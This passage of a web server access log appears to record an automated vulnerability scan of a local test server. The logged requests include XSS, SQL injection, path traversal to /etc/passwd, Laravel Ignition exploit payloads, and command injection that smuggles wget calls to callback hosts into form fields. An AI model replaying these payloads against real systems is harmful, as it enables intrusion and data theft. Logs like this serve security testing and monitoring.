(KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apc.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_users/_all_docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:%0a%0dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"------WebKitFormBoundaryfcKRltGv\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22test.php\x22\x0D\x0AContent-Type: image/avif\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundaryfcKRltGv--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Upload/upload_file.php?l=test HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"browserTime=081119502020¤tTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/system/deviceinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\x22'; wget http://ca28q98smpvbk9ig07h08z5ep8947qrr4.oast.online #","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?redirect=//evil.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apps HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\x22%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/upload/web-ftp.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.026","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CgiStart?page=Single HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%2729KFpaFyEZU1pHaS2xr63ft3e60%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pma/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /getFavicon?host=http://ca28q98smpvbk9ig07h0dmwi9rygoioow.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%0a%0dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Upload/test/test.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /README.md HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;wget http://ca28q98smpvbk9ig07h0q1ca644rr7f54.oast.online&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_log.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_next/static/../server/pages-manifest.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_dashboards/app/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"username={{username}}&password={{password}}&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=0776a6f87a8143af12c1e7bbd0bf4197 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22phar://../storage/logs/laravel.log/test.txt\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/arforms/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337\x22>&id=3&nsvpx=phpinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/projects HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /EMSWebClient/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/cq/security/userinfo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%09/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /client/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /chpstrt.php?chppath=Home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/metadata/instance?api-version=2021-02-01 HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.461","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/login.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 